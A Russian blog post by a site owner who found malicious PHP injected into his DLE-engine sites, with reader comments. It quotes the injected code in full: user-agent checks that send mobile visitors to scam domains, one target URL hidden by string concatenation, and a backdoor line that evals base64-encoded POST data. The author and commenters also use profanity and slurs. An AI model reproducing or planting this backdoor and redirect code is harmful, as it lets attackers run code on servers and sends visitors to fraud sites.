Страницы
Промо
Кто такие statuses.ws, ya-analytics.ws и getinternet.ws
Недавно на своих старых проектах я обнаружил заразу. Какой-то пидорас, нехороший человек, поломал движок DLE. И воткнул мне в код шаблонов и функция кучки кодов, которые перенаправляли людей пришедших ко мне с поисковых система на левые сайты с порнухой, вирусами и прочими радостями жизни.
Что интересно, основной интерес у них представляли юзеры мобильных девайсов, iPhone, Android, BlackBerry и пр.
Вот пример первого кода.
if (strpos($_SERVER['HTTP_USER_AGENT'],"iPhone") || strpos($_SERVER['HTTP_USER_AGENT'],"Android") || strpos($_SERVER['HTTP_USER_AGENT'],"webOS") || strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry") || strpos($_SERVER['HTTP_USER_AGENT'],"iPod")) header('Location: https://yandex-google.ws/');
if(!empty($_POST['update'])) eval(base64_decode($_POST['update']));
$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");
$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");
$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");
$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");if ($iphone || $android || $palmpre || $ipod || $berry === true) {
header('Location: https://statuses.ws/');
}
if (strpos($_SERVER['HTTP_USER_AGENT'],"iPhone") || strpos($_SERVER['HTTP_USER_AGENT'],"Android") || strpos($_SERVER['HTTP_USER_AGENT'],"webOS") || strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry") || strpos($_SERVER['HTTP_USER_AGENT'],"iPod")) header('Location: https://ya-analytics.ws/');
if(!empty($_POST['update'])) eval(base64_decode($_POST['update']));
В данном случае перенаправление шло на statuses.ws и ya-analytics.ws.
Следующий педик
if (strpos($_SERVER['HTTP_USER_AGENT'],"iPhone") ||
strpos($_SERVER['HTTP_USER_AGENT'],"Android") ||
strpos($_SERVER['HTTP_USER_AGENT'],"webOS") ||
strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry") ||
strpos($_SERVER['HTTP_USER_AGENT'],"iPod"))
header('Location: https://getinternet.ws/');
if(!empty($_POST['update'])) eval(base64_decode($_POST['update']));
Отправлял людей на getinternet.ws.
А последний гнал трафик на up.cc.co.id/u/4590? по всей видимости какая-то траф партнерка.
if(preg_match('/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone)/i',$_SERVER['HTTP_USER_AGENT']) && $_COOKIE["m_"] != 1)
{
@setcookie('m_', '1', time()+86400, '/');
@header("Location: "."h"."t"."t"."p".":"."/"."/"."u"."p"."."."c"."c"."."."c"."o"."."."i"."d"."/"."u"."/"."4"."5"."9"."0");
die();}
На всех этих сайтах: statuses.ws, ya-analytics.ws и getinternet.ws предлагалось установить себе несуществующие обновления для любых браузеров, почиститься от вирусов, которых у вас нет и отправить куда-нибудь СМС. В общем обычные мошенники. Я был настолько расстроен, что мои сайты так дешево наебнули, что ушел от движка DLE и продал свои старые сайты к чертям собачьим.
Комментарии
| Комментарий от byroot [ 9 апреля, 2013, 05:42 ] |
обновлять DLE нужно было своевременно, тогда вероятность взлома сайтов резко уменьшается… |
| Комментарий от [ 9 апреля, 2013, 13:45 ] |
Тюперь знаю :( |
| Комментарий от [ 22 апреля, 2013, 23:42 ] |
Да мне тоже какой-то ПИД… редиска такой-же код всунул в очень даже белый и малопосещаемый сайт только для своих. Лядь, прийдётся прощаться с DLE. гавно а не движок, немцы его изначально нормально сделали а наши потом только испоганили своими переделками и стали типа за это деньги брать. пошёл ка я на WordPress |
| Комментарий от [ 23 апреля, 2013, 16:58 ] |
вордпресс сильно жирный. даже с кешем очень грузит сервер |
Написать комментарий